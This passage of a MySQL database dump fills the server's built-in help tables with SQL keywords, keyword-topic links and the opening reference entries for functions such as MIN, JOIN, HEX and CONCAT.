'DATABASE'),(252,'NULL'),(253,'POWER'),(254,'POINTFROMWKB'),(255,'USE_FRM'),(256,'TERMINATED'),(257,'NVARCHAR'),(258,'RETURN'),(259,'DIRECTORY'),(260,'AES_DECRYPT'),(261,'GLENGTH'),(262,'SHUTDOWN'),(263,'CATALOG_NAME'),(264,'FIXED'),(265,'MULTIPOLYGONFROMTEXT'),(266,'REPLACE'),(267,'REPEAT'),(268,'STARTS'),(269,'COMPLETION'),(270,'COLUMNS'),(271,'DATETIME'),(272,'MODE'),(273,'INTEGER'),(274,'VALUE'),(275,'ASWKT'),(276,'GEOMETRYCOLLECTIONFROMWKB'),(277,'DROP'),(278,'SQL_BIG_RESULT'),(279,'MASTER_SSL_VERIFY_SERVER_CERT'),(280,'SUBJECT'),(281,'CHECK'),(282,'FULL'),(283,'BY'),(284,'NO'),(285,'DAY'),(286,'DATA'),(287,'PARTITION'),(288,'REAL'),(289,'SHARE'),(290,'LINESTRING'),(291,'MASTER_HEARTBEAT_PERIOD'),(292,'MESSAGE_TEXT'),(293,'COLUMN_NAME'),(294,'LINEFROMTEXT'),(295,'X509'),(296,'WHERE'),(297,'SUBCLASS_ORIGIN'),(298,'EVENT'),(299,'IGNORE'),(300,'SUPER'),(301,'SHA2'),(302,'QUICK'),(303,'SIGNED'),(304,'OFFLINE'),(305,'FALSE'),(306,'POLYGONFROMWKB'),(307,'FORCE'),(308,'CHANGE'),(309,'TO'),(310,'POINT'),(311,'TABLE_NAME'),(312,'VARYING'),(313,'FEDERATED'),(314,'MAX_SIZE'),(315,'HOUR_SECOND'),(316,'GEOMETRYCOLLECTION'),(317,'PROCEDURE'),(318,'AGAINST'),(319,'ENDPOINT'),(320,'LONGBINARY'),(321,'INSERT'),(322,'COUNT'),(323,'PORT'),(324,'MLINEFROMTEXT'),(325,'EXISTS'),(326,'MUTEX'),(327,'RELEASE'),(328,'DEFAULT'),(329,'TYPE'),(330,'NO_WRITE_TO_BINLOG'),(331,'OPTIMIZE'),(332,'SQLSTATE'),(333,'RESET'),(334,'INSTALL'),(335,'BIGINT'),(336,'SET'),(337,'ISSUER'),(338,'STATUS'),(339,'INNER'),(340,'RELAYLOG'),(341,'MRG_MYISAM'),(342,'STOP'),(343,'TRAILING'),(344,'PARTITIONS'),(345,'CASE'),(346,'IO_THREAD'),(347,'DEALLOCATE'),(348,'CIPHER'),(349,'CONTINUE'),(350,'READ'),(351,'MINUTE_SECOND'),(352,'MIN_ROWS'),(353,'FUNCTION'),(354,'INT3'),(355,'ADD'),(356,'AVG_ROW_LENGTH'),(357,'ARCHIVE'),(358,'FLOAT4'),(359,'ASTEXT'),(360,'NUMGEOMETRIES'),(361,'VIEW'),(362,'REPEATABLE'),(363,'STARTPOINT'),(364,'CONSTRAINT_CATALOG'),(365,'MPOLYFROMTEXT'),(366,'UNSIGNED'),(367,'DECIMAL'),(368,'INDEXES'),(369,'HOSTS'),(370,'COMMIT'),(371,'SNAPSHOT'),(372,'DECLARE'),(373,'NUMPOINTS'),(374,'LOAD'),(375,'SQL_CACHE'),(376,'COLLATE'),(377,'BYTE'),(378,'LINESTRINGFROMWKB'),(379,'GLOBAL'),(380,'WHEN'),(381,'TOUCHES'),(382,'AS'),(383,'GEOMCOLLFROMTEXT'),(384,'GRANTS'),(385,'OUTER'),(386,'CURSOR_NAME'),(387,'FLOOR'),(388,'WITH'),(389,'STD'),(390,'AFTER'),(391,'DISABLE'),(392,'UNINSTALL'),(393,'POW'),(394,'SONAME'),(395,'INDEX'),(396,'DEFINER'),(397,'MASTER_BIND'),(398,'REMOVE'),(399,'MULTILINESTRINGFROMWKB'),(400,'ONLINE'),(401,'UNDO'),(402,'ZEROFILL'),(403,'CLIENT'),(404,'MASTER_PASSWORD'),(405,'RELAY_LOG_FILE'),(406,'MBRTOUCHES'),(407,'MASTER_USER'),(408,'ENGINE'),(409,'INSERT_METHOD'),(410,'SQL_CALC_FOUND_ROWS'),(411,'UNION'),(412,'MYISAM'),(413,'DESC'),(414,'TIME'),(415,'EXPANSION'),(416,'NUMERIC'),(417,'CODE'),(418,'AREA'),(419,'LOGFILE'),(420,'EXTENT_SIZE'),(421,'INT2'),(422,'MAX_UPDATES_PER_HOUR'),(423,'ENDS'),(424,'ISEMPTY'),(425,'RECOVER'),(426,'LOGS'),(427,'HEAP'),(428,'BETWEEN'),(429,'REPAIR'),(430,'MBRDISJOINT'),(431,'CALL'),(432,'VALUES'),(433,'TRUNCATE'),(434,'SHOW'),(435,'BINLOG'),(436,'AND'),(437,'HOUR'),(438,'SELECT'),(439,'DATABASES'),(440,'WRAPPER'),(441,'BOOL'),(442,'MASTER_PORT'),(443,'CONCURRENT'),(444,'HELP'),(445,'OPTIONS'),(446,'PROCESS'),(447,'CONSISTENT'),(448,'MAX_CONNECTIONS_PER_HOUR'),(449,'IN'),(450,'DUMPFILE'),(451,'POLYFROMTEXT'),(452,'EXECUTE'),(453,'CEIL'),(454,'MASTER_HOST'),(455,'SERVER'),(456,'MULTIPOLYGONFROMWKB'),(457,'MASTER_SSL_CERT'),(458,'DAY_MINUTE'),(459,'DATE_SUB'),(460,'REBUILD'),(461,'GEOMETRYFROMWKB'),(462,'PARSER'),(463,'RENAME'),(464,'GEOMFROMTEXT'),(465,'SOCKET'),(466,'STRAIGHT_JOIN'),(467,'SHA1'),(468,'PASSWORD'),(469,'OFFSET'),(470,'NEXT'),(471,'TEMPORARY'),(472,'SQL_LOG_BIN'),(473,'ERRORS'),(474,'DIMENSION'),(475,'SQL_SMALL_RESULT'),(476,'COMMITTED'),(477,'EQUALS'),(478,'DELAY_KEY_WRITE'),(479,'BEGIN'),(480,'XA'),(481,'PROFILE'),(482,'CENTROID'),(483,'MEDIUM'),(484,'SSL'),(485,'DAY_HOUR'),(486,'AES_ENCRYPT'),(487,'GEOMCOLLROMWKB'),(488,'CEILING'),(489,'LINEFROMWKB'),(490,'GEOMETRYTYPE'),(491,'SIGNAL'),(492,'PLUGINS'),(493,'SAVEPOINT'),(494,'PRIMARY'),(495,'LAST'),(496,'KEYS'),(497,'MPOINTFROMWKB'),(498,'LIMIT'),(499,'KEY'),(500,'UNTIL'),(501,'CONSTRAINT_SCHEMA'),(502,'ANALYZE'),(503,'CONSTRAINT'),(504,'SERIAL'),(505,'ACTION'),(506,'INITIAL_SIZE'),(507,'SESSION'),(508,'SLAVE'),(509,'ASC'),(510,'ENABLE'),(511,'OPTIONALLY'),(512,'DISTINCT'),(513,'LOCAL'),(514,'WHILE'),(515,'MAX_USER_CONNECTIONS'),(516,'MASTER_SSL_KEY'),(517,'NONE'),(518,'TABLES'),(519,'<>'),(520,'RLIKE'),(521,'TRIGGER'),(522,'HIGH_PRIORITY'),(523,'COLLATION'),(524,'BTREE'),(525,'COALESCE'),(526,'FIRST'),(527,'WAIT'),(528,'MASTER'),(529,'ROW_FORMAT'); /*!40000 ALTER TABLE `help_keyword` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `help_relation` -- DROP TABLE IF EXISTS `help_relation`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `help_relation` ( `help_topic_id` int(10) unsigned NOT NULL, `help_keyword_id` int(10) unsigned NOT NULL, PRIMARY KEY (`help_keyword_id`,`help_topic_id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='keyword-topic relation'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `help_relation` -- LOCK TABLES `help_relation` WRITE; /*!40000 ALTER TABLE `help_relation` DISABLE KEYS */; INSERT INTO `help_relation` VALUES (1,0),(356,0),(476,1),(450,2),(4,3),(5,4),(90,5),(90,6),(407,6),(98,7),(185,8),(431,9),(436,10),(146,11),(18,12),(107,12),(135,12),(346,12),(381,13),(123,14),(170,14),(425,14),(377,15),(83,16),(27,17),(105,18),(199,19),(37,20),(346,21),(471,21),(377,22),(32,23),(36,24),(238,24),(436,24),(37,25),(356,25),(471,26),(503,27),(41,28),(377,29),(361,30),(50,31),(471,31),(475,31),(1,32),(90,32),(407,32),(475,32),(176,33),(471,33),(53,34),(107,34),(1,35),(57,35),(194,35),(193,36),(199,36),(250,36),(210,37),(466,37),(356,38),(199,39),(194,40),(471,41),(450,42),(40,43),(230,43),(270,43),(90,44),(407,44),(377,45),(84,46),(105,46),(356,46),(475,46),(90,47),(407,47),(3,48),(105,48),(305,48),(356,48),(92,49),(130,50),(146,51),(436,51),(463,51),(100,52),(188,52),(422,53),(466,53),(402,54),(471,54),(29,55),(59,55),(86,55),(283,56),(346,56),(107,57),(314,57),(377,58),(110,59),(24,60),(89,60),(114,61),(174,61),(375,62),(462,62),(124,63),(125,64),(90,65),(126,65),(407,65),(499,65),(133,66),(230,66),(263,66),(377,66),(210,67),(466,67),(471,67),(90,68),(194,68),(210,68),(407,68),(471,68),(185,69),(185,70),(315,71),(199,72),(286,73),(199,74),(250,74),(466,75),(59,76),(86,76),(143,77),(144,78),(50,79),(123,79),(346,79),(356,79),(425,79),(458,79),(148,80),(1,81),(29,82),(471,83),(209,84),(180,85),(314,85),(346,85),(356,85),(421,85),(329,86),(346,86),(98,87),(180,88),(422,89),(98,90),(346,91),(422,91),(176,92),(177,93),(194,94),(416,94),(466,94),(481,94),(181,95),(131,96),(422,96),(187,97),(190,98),(50,99),(84,99),(356,99),(361,99),(466,99),(1,100),(50,100),(87,100),(253,101),(199,102),(250,102),(203,103),(213,104),(413,105),(466,106),(471,106),(475,106),(476,106),(102,107),(151,107),(305,107),(375,108),(462,108),(160,109),(346,109),(458,110),(375,111),(462,111),(230,112),(378,112),(471,113),(396,114),(240,115),(356,116),(422,117),(199,118),(245,119),(146,120),(250,121),(256,122),(422,123),(471,123),(356,124),(3,125),(37,125),(50,125),(84,125),(105,125),(131,125),(422,125),(199,126),(194,127),(155,128),(186,128),(212,128),(310,128),(346,128),(273,129),(280,130),(467,131),(426,132),(256,133),(469,133),(1,134),(7,135),(346,135),(259,136),(431,136),(49,137),(194,137),(226,137),(231,137),(356,137),(428,138),(287,139),(185,140),(293,141),(298,142),(476,143),(386,144),(131,145),(155,145),(212,145),(259,145),(332,145),(346,145),(356,145),(422,145),(431,145),(471,145),(375,146),(462,146),(65,147),(111,147),(116,147),(215,147),(277,147),(279,147),(321,147),(346,147),(402,147),(418,147),(466,147),(469,147),(471,147),(473,147),(31,148),(277,148),(471,148),(475,148),(185,149),(293,150),(311,151),(466,152),(89,153),(185,154),(356,155),(317,156),(421,157),(320,158),(247,159),(146,160),(151,161),(326,161),(17,162),(22,162),(49,162),(65,162),(78,162),(90,162),(98,162),(155,162),(194,162),(210,162),(211,162),(279,162),(303,162),(310,162),(346,162),(358,162),(394,162),(457,162),(471,162),(476,162),(256,163),(346,164),(454,164),(466,165),(379,166),(471,167),(108,168),(337,169),(418,170),(343,171),(259,172),(270,173),(39,174),(199,174),(250,174),(306,174),(356,174),(471,175),(326,176),(471,177),(29,178),(59,178),(86,178),(233,178),(327,178),(343,178),(436,178),(499,178),(377,179),(315,180),(107,181),(354,182),(359,183),(78,184),(131,184),(199,184),(362,185),(185,186),(182,187),(458,188),(377,189),(466,190),(25,191),(346,191),(375,192),(185,193),(377,194),(346,195),(379,195),(292,196),(346,196),(420,196),(382,197),(384,198),(387,199),(466,200),(199,201),(356,202),(89,203),(151,203),(176,203),(401,204),(131,205),(422,205),(54,206),(324,206),(404,207),(403,208),(199,209),(146,210),(450,210),(408,211),(24,212),(1,213),(471,214),(65,215),(159,215),(199,215),(212,215),(226,215),(234,215),(374,215),(407,215),(442,215),(466,215),(481,215),(1,216),(423,217),(346,218),(348,218),(422,219),(471,220),(426,221),(230,222),(468,222),(212,223),(418,223),(90,224),(377,224),(212,225),(199,226),(471,226),(475,226),(283,227),(450,228),(90,229),(129,230),(10,231),(346,231),(31,232),(277,232),(475,232),(450,233),(58,234),(85,235),(206,235),(369,235),(459,235),(85,236),(90,236),(155,236),(206,236),(313,236),(194,237),(481,237),(189,238),(326,239),(471,240),(146,241),(324,241),(436,241),(9,242),(29,242),(31,242),(90,242),(155,242),(186,242),(277,242),(301,242),(483,242),(131,243),(270,244),(78,245),(222,245),(330,245),(476,245),(314,246),(471,247),(356,248),(3,249),(105,249),(489,249),(37,250),(436,250),(155,251),(186,251),(212,251),(310,251),(346,251),(476,251),(85,252),(369,252),(475,252),(486,253),(485,254),(469,255),(422,256),(259,257),(494,258),(212,259),(471,259),(500,260),(504,261),(199,262),(375,263),(462,263),(209,264),(471,264),(201,265),(3,266),(131,266),(422,266),(233,267),(90,268),(90,269),(407,269),(21,270),(346,270),(422,270),(466,270),(471,270),(230,271),(89,272),(356,272),(98,273),(230,273),(503,273),(3,274),(105,274),(244,274),(375,274),(462,274),(178,275),(109,276),(9,277),(31,277),(35,277),(88,277),(186,277),(231,277),(238,277),(264,277),(277,277),(301,277),(330,277),(406,277),(416,277),(417,277),(466,277),(481,277),(356,278),(185,279),(199,280),(418,281),(466,281),(471,281),(21,282),(295,282),(346,282),(454,282),(471,282),(50,283),(78,283),(84,283),(131,283),(199,283),(356,283),(361,283),(422,283),(466,283),(471,283),(471,284),(475,284),(377,285),(212,286),(422,286),(471,286),(476,286),(466,287),(471,287),(98,288),(315,288),(356,289),(47,290),(185,291),(375,292),(462,292),(375,293),(462,293),(58,294),(199,295),(50,296),(84,296),(107,296),(375,297),(462,297),(90,298),(301,298),(358,298),(407,298),(1,299),(84,299),(105,299),(131,299),(356,299),(422,299),(466,299),(199,300),(68,301),(50,302),(418,302),(469,302),(230,303),(88,304),(210,304),(466,304),(386,305),(92,306),(1,307),(185,308),(466,308),(185,309),(270,309),(463,309),(79,310),(375,311),(462,311),(259,312),(471,313),(194,314),(377,315),(97,316),(17,317),(189,317),(303,317),(328,317),(346,317),(356,317),(417,317),(442,317),(491,317),(89,318),(103,319),(286,320),(105,321),(195,321),(302,321),(489,321),(71,322),(329,322),(434,322),(476,323),(108,324),(9,325),(31,325),(90,325),(155,325),(186,325),(277,325),(301,325),(346,326),(366,326),(146,327),(436,327),(463,327),(3,328),(105,328),(155,328),(200,328),(212,328),(244,328),(466,328),(471,328),(466,329),(116,330),(326,330),(469,330),(473,330),(116,331),(466,331),(375,332),(462,332),(39,333),(120,333),(151,333),(265,333),(420,334),(221,335),(3,336),(84,336),(105,336),(130,336),(131,336),(146,336),(155,336),(182,336),(212,336),(332,336),(346,336),(356,336),(375,336),(422,336),(462,336),(466,336),(471,336),(475,336),(480,336),(497,336),(199,337),(60,338),(138,338),(215,338),(223,338),(328,338),(335,338),(346,338),(366,338),(1,339),(425,340),(471,341),(54,342),(458,343),(256,344),(59,345),(86,345),(54,346),(324,346),(238,347),(199,348),(314,349),(37,350),(107,350),(436,350),(450,350),(377,351),(471,352),(35,353),(70,353),(98,353),(211,353),(234,353),(303,353),(335,353),(346,353),(394,353),(406,353),(417,353),(253,354),(65,355),(194,355),(466,355),(481,355),(466,356),(471,356),(471,357),(168,358),(178,359),(183,360),(31,361),(159,361),(457,361),(450,362),(198,363),(375,364),(462,364),(201,365),(24,366),(129,366),(168,366),(209,366),(230,366),(315,366),(503,366),(98,367),(156,367),(230,367),(346,368),(145,369),(346,369),(146,370),(436,370),(146,371),(436,371),(180,372),(200,372),(314,372),(421,372),(225,373),(305,374),(422,374),(356,375),(155,376),(212,376),(471,376),(468,377),(455,378),(130,379),(138,379),(182,379),(348,379),(450,379),(59,380),(86,380),(241,381),(1,382),(37,382),(356,382),(247,383),(192,384),(346,384),(1,385),(375,386),(462,386),(221,387),(89,388),(199,388),(210,388),(466,388),(471,388),(261,389),(466,390),(90,391),(407,391),(466,391),(292,392),(278,393),(98,394),(1,395),(65,395),(88,395),(102,395),(210,395),(305,395),(309,395),(346,395),(466,395),(471,395),(90,396),(407,396),(185,397),(466,398),(273,399),(88,400),(210,400),(466,400),(314,401),(24,402),(129,402),(168,402),(209,402),(315,402),(503,402),(199,403),(185,404),(185,405),(300,406),(185,407),(194,408),(346,408),(366,408),(416,408),(466,408),(471,408),(481,408),(471,409),(356,410),(306,411),(471,412),(256,413),(356,413),(361,413),(230,414),(316,414),(376,414),(89,415),(209,416),(70,417),(491,417),(325,418),(49,419),(194,419),(226,419),(231,419),(194,420),(235,421),(199,422),(90,423),(334,424),(436,425),(40,426),(270,426),(346,426),(471,427),(147,428),(466,429),(469,429),(340,430),(338,431),(3,432),(105,432),(321,433),(466,433),(7,434),(10,434),(17,434),(21,434),(25,434),(34,434),(40,434),(60,434),(70,434),(71,434),(83,434),(123,434),(135,434),(138,434),(145,434),(160,434),(170,434),(192,434),(193,434),(215,434),(223,434),(279,434),(283,434),(295,434),(309,434),(310,434),(328,434),(329,434),(332,434),(335,434),(346,434),(348,434),(358,434),(366,434),(394,434),(425,434),(454,434),(490,434),(491,434),(495,434),(123,435),(349,435),(147,436),(352,436),(377,437),(3,438),(105,438),(256,438),(302,438),(356,438),(160,439),(346,439),(476,440),(24,441),(112,441),(185,442),(131,443),(422,443),(119,444),(391,444),(374,445),(476,445),(199,446),(146,447),(436,447),(199,448),(89,449),(123,449),(356,449),(425,449),(356,450),(396,451),(87,452),(199,452),(398,453),(185,454),(9,455),(374,455),(476,455),(124,456),(185,457),(377,458),(377,459),(466,460),(144,461),(210,462),(466,462),(471,462),(111,463),(222,463),(407,463),(466,463),(413,464),(476,465),(1,466),(356,466),(428,467),(78,468),(199,468),(476,468),(480,468),(356,469),(107,470),(277,471),(497,472),(71,473),(346,473),(433,474),(356,475),(450,476),(437,477),(471,478),(146,479),(327,479),(436,479),(436,480),(490,481),(439,482),(418,483),(199,484),(377,485),(446,486),(109,487),(451,488),(455,489),(456,490),(462,491),(34,492),(463,493),(466,494),(107,495),(309,496),(346,496),(466,496),(467,497),(50,498),(84,498),(107,498),(123,498),(356,498),(425,498),(65,499),(105,499),(466,499),(471,499),(475,499),(233,500),(375,501),(462,501),(466,502),(473,502),(466,503),(471,503),(244,504),(471,504),(471,505),(475,505),(194,506),(481,506),(130,507),(138,507),(348,507),(450,507),(39,508),(54,508),(90,508),(145,508),(223,508),(324,508),(407,508),(356,509),(361,509),(90,510),(407,510),(466,510),(422,511),(0,512),(96,512),(289,512),(306,512),(356,512),(361,512),(385,512),(434,512),(37,513),(116,513),(131,513),(326,513),(422,513),(469,513),(473,513),(499,514),(199,515),(185,516),(199,517),(37,518),(135,518),(295,518),(346,518),(498,519),(28,520),(22,521),(264,521),(346,521),(105,522),(356,522),(346,523),(495,523),(210,524),(466,525),(107,526),(466,526),(471,526),(194,527),(481,527),(40,528),(60,528),(185,528),(265,528),(270,528),(471,529); /*!40000 ALTER TABLE `help_relation` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `help_topic` -- DROP TABLE IF EXISTS `help_topic`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `help_topic` ( `help_topic_id` int(10) unsigned NOT NULL, `name` char(64) NOT NULL, `help_category_id` smallint(5) unsigned NOT NULL, `description` text NOT NULL, `example` text NOT NULL, `url` text NOT NULL, PRIMARY KEY (`help_topic_id`), UNIQUE KEY `name` (`name`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='help topics'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `help_topic` -- LOCK TABLES `help_topic` WRITE; /*!40000 ALTER TABLE `help_topic` DISABLE KEYS */; INSERT INTO `help_topic` VALUES (0,'MIN',16,'Syntax:\nMIN([DISTINCT] expr)\n\nReturns the minimum value of expr. MIN() may take a string argument; in\nsuch cases, it returns the minimum string value. See\nhttp://dev.mysql.com/doc/refman/5.5/en/mysql-indexes.html. The DISTINCT\nkeyword can be used to find the minimum of the distinct values of expr,\nhowever, this produces the same result as omitting DISTINCT.\n\nMIN() returns NULL if there were no matching rows.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/group-by-functions.html\n\n','mysql> SELECT student_name, MIN(test_score), MAX(test_score)\n -> FROM student\n -> GROUP BY student_name;\n','http://dev.mysql.com/doc/refman/5.5/en/group-by-functions.html'),(1,'JOIN',28,'MySQL supports the following JOIN syntaxes for the table_references\npart of SELECT statements and multiple-table DELETE and UPDATE\nstatements:\n\ntable_references:\n escaped_table_reference [, escaped_table_reference] ...\n\nescaped_table_reference:\n table_reference\n | { OJ table_reference }\n\ntable_reference:\n table_factor\n | join_table\n\ntable_factor:\n tbl_name [[AS] alias] [index_hint_list]\n | table_subquery [AS] alias\n | ( table_references )\n\njoin_table:\n table_reference [INNER | CROSS] JOIN table_factor [join_condition]\n | table_reference STRAIGHT_JOIN table_factor\n | table_reference STRAIGHT_JOIN table_factor ON conditional_expr\n | table_reference {LEFT|RIGHT} [OUTER] JOIN table_reference join_condition\n | table_reference NATURAL [{LEFT|RIGHT} [OUTER]] JOIN table_factor\n\njoin_condition:\n ON conditional_expr\n | USING (column_list)\n\nindex_hint_list:\n index_hint [, index_hint] ...\n\nindex_hint:\n USE {INDEX|KEY}\n [FOR {JOIN|ORDER BY|GROUP BY}] ([index_list])\n | IGNORE {INDEX|KEY}\n [FOR {JOIN|ORDER BY|GROUP BY}] (index_list)\n | FORCE {INDEX|KEY}\n [FOR {JOIN|ORDER BY|GROUP BY}] (index_list)\n\nindex_list:\n index_name [, index_name] ...\n\nA table reference is also known as a join expression.\n\nThe syntax of table_factor is extended in comparison with the SQL\nStandard. The latter accepts only table_reference, not a list of them\ninside a pair of parentheses.\n\nThis is a conservative extension if we consider each comma in a list of\ntable_reference items as equivalent to an inner join. For example:\n\nSELECT * FROM t1 LEFT JOIN (t2, t3, t4)\n ON (t2.a=t1.a AND t3.b=t1.b AND t4.c=t1.c)\n\nis equivalent to:\n\nSELECT * FROM t1 LEFT JOIN (t2 CROSS JOIN t3 CROSS JOIN t4)\n ON (t2.a=t1.a AND t3.b=t1.b AND t4.c=t1.c)\n\nIn MySQL, JOIN, CROSS JOIN, and INNER JOIN are syntactic equivalents\n(they can replace each other). In standard SQL, they are not\nequivalent. INNER JOIN is used with an ON clause, CROSS JOIN is used\notherwise.\n\nIn general, parentheses can be ignored in join expressions containing\nonly inner join operations. MySQL also supports nested joins (see\nhttp://dev.mysql.com/doc/refman/5.5/en/nested-join-optimization.html).\n\nIndex hints can be specified to affect how the MySQL optimizer makes\nuse of indexes. For more information, see\nhttp://dev.mysql.com/doc/refman/5.5/en/index-hints.html.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/join.html\n\n','SELECT left_tbl.*\n FROM left_tbl LEFT JOIN right_tbl ON left_tbl.id = right_tbl.id\n WHERE right_tbl.id IS NULL;\n','http://dev.mysql.com/doc/refman/5.5/en/join.html'),(2,'HEX',38,'Syntax:\nHEX(str), HEX(N)\n\nFor a string argument str, HEX() returns a hexadecimal string\nrepresentation of str where each byte of each character in str is\nconverted to two hexadecimal digits. (Multibyte characters therefore\nbecome more than two digits.) The inverse of this operation is\nperformed by the UNHEX() function.\n\nFor a numeric argument N, HEX() returns a hexadecimal string\nrepresentation of the value of N treated as a longlong (BIGINT) number.\nThis is equivalent to CONV(N,10,16). The inverse of this operation is\nperformed by CONV(HEX(N),16,10).\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/string-functions.html\n\n','mysql> SELECT 0x616263, HEX(\'abc\'), UNHEX(HEX(\'abc\'));\n -> \'abc\', 616263, \'abc\'\nmysql> SELECT HEX(255), CONV(HEX(255),16,10);\n -> \'FF\', 255\n','http://dev.mysql.com/doc/refman/5.5/en/string-functions.html'),(3,'REPLACE',28,'Syntax:\nREPLACE [LOW_PRIORITY | DELAYED]\n [INTO] tbl_name [(col_name,...)]\n {VALUES | VALUE} ({expr | DEFAULT},...),(...),...\n\nOr:\n\nREPLACE [LOW_PRIORITY | DELAYED]\n [INTO] tbl_name\n SET col_name={expr | DEFAULT}, ...\n\nOr:\n\nREPLACE [LOW_PRIORITY | DELAYED]\n [INTO] tbl_name [(col_name,...)]\n SELECT ...\n\nREPLACE works exactly like INSERT, except that if an old row in the\ntable has the same value as a new row for a PRIMARY KEY or a UNIQUE\nindex, the old row is deleted before the new row is inserted. See [HELP\nINSERT].\n\nREPLACE is a MySQL extension to the SQL standard. It either inserts, or\ndeletes and inserts. For another MySQL extension to standard SQL---that\neither inserts or updates---see\nhttp://dev.mysql.com/doc/refman/5.5/en/insert-on-duplicate.html.\n\n*Note*: REPLACE makes sense only if a table has a PRIMARY KEY or UNIQUE\nindex. Otherwise, it becomes equivalent to INSERT, because there is no\nindex to be used to determine whether a new row duplicates another.\n\nValues for all columns are taken from the values specified in the\nREPLACE statement. Any missing columns are set to their default values,\njust as happens for INSERT. You cannot refer to values from the current\nrow and use them in the new row. If you use an assignment such as SET\ncol_name = col_name + 1, the reference to the column name on the right\nhand side is treated as DEFAULT(col_name), so the assignment is\nequivalent to SET col_name = DEFAULT(col_name) + 1.\n\nTo use REPLACE, you must have both the INSERT and DELETE privileges for\nthe table.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/replace.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/replace.html'),(4,'CONTAINS',31,'Contains(g1,g2)\n\nReturns 1 or 0 to indicate whether g1 completely contains g2. This\ntests the opposite relationship as Within().\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/spatial-relation-functions-mbr.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/spatial-relation-functions-mbr.html'),(5,'SRID',37,'SRID(g)\n\nReturns an integer indicating the Spatial Reference System ID for the\ngeometry value g.\n\nIn MySQL, the SRID value is just an integer associated with the\ngeometry value. All calculations are done assuming Euclidean (planar)\ngeometry.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/gis-general-property-functions.html\n\n','mysql> SELECT SRID(GeomFromText(\'LineString(1 1,2 2)\',101));\n+-----------------------------------------------+\n| SRID(GeomFromText(\'LineString(1 1,2 2)\',101)) |\n+-----------------------------------------------+\n| 101 |\n+-----------------------------------------------+\n','http://dev.mysql.com/doc/refman/5.5/en/gis-general-property-functions.html'),(6,'CURRENT_TIMESTAMP',32,'Syntax:\nCURRENT_TIMESTAMP, CURRENT_TIMESTAMP()\n\nCURRENT_TIMESTAMP and CURRENT_TIMESTAMP() are synonyms for NOW().\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html'),(7,'SHOW CONTRIBUTORS',27,'Syntax:\nSHOW CONTRIBUTORS\n\nThe SHOW CONTRIBUTORS statement displays information about the people\nwho contribute to MySQL source or to causes that we support. For each\ncontributor, it displays Name, Location, and Comment values.\n\nThis statement is deprecated as of MySQL 5.5.29 and is removed in MySQL\n5.6.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/show-contributors.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/show-contributors.html'),(8,'VARIANCE',16,'Syntax:\nVARIANCE(expr)\n\nReturns the population standard variance of expr. This is an extension\nto standard SQL. The standard SQL function VAR_POP() can be used\ninstead.\n\nVARIANCE() returns NULL if there were no matching rows.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/group-by-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/group-by-functions.html'),(9,'DROP SERVER',40,'Syntax:\nDROP SERVER [ IF EXISTS ] server_name\n\nDrops the server definition for the server named server_name. The\ncorresponding row in the mysql.servers table is deleted. This statement\nrequires the SUPER privilege.\n\nDropping a server for a table does not affect any FEDERATED tables that\nused this connection information when they were created. See [HELP\nCREATE SERVER].\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/drop-server.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/drop-server.html'),(10,'SHOW AUTHORS',27,'Syntax:\nSHOW AUTHORS\n\nThe SHOW AUTHORS statement displays information about the people who\nwork on MySQL. For each author, it displays Name, Location, and Comment\nvalues.\n\nThis statement is deprecated as of MySQL 5.5.29 and is removed in MySQL\n5.6.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/show-authors.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/show-authors.html'),(11,'VAR_SAMP',16,'Syntax:\nVAR_SAMP(expr)\n\nReturns the sample variance of expr. That is, the denominator is the\nnumber of rows minus one.\n\nVAR_SAMP() returns NULL if there were no matching rows.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/group-by-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/group-by-functions.html'),(12,'CONCAT',38,'Syntax:\nCONCAT(str1,str2,...)\n\nReturns the string that results from concatenating the arguments. May\nhave one or more arguments. If all arguments are nonbinary strings, the\nresult is a nonbinary string. If the arguments include any binary\nstrings, the result is a binary string. A numeric argument is converted\nto its equivalent string form. This is a nonbinary string as of MySQL\n5.5.3. Before 5.5.3, it is a binary string; to avoid that and produce a\nnonbinary string, you can use an explicit type cast, as in this\nexample:\n\nSELECT CONCAT(CAST(int_col AS CHAR), char_col);\n\nCONCAT() returns NULL if any argument is NULL.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/string-functions.html\n\n','mysql> SELECT CONCAT(\'My\', \'S\', \'QL\');\n -> \'MySQL\'\nmysql> SELECT CONCAT(\'My\', NULL, \'QL\');\n -> NULL\nmysql> SELECT CONCAT(14.3);\n -> \'14.3\'\n','http://dev.mysql.com/doc/refman/5.5/en/string-functions.html'),(13,'GEOMETRY HIERARCHY',35,'Geometry is the base class. It is an abstract class. The instantiable\nsubclasses of Geometry are restricted to zero-, one-, and\ntwo-dimensional geometric objects that exist in two-dimensional\ncoordinate space. All instantiable geometry classes are defined so that\nvalid instances of a geometry class are topologically closed (that is,\nall defined geometries include their boundary).\n\nThe base Geometry class has subclasses for Point, Curve, Surface, and\nGeometryCollection:\n\no Point represents 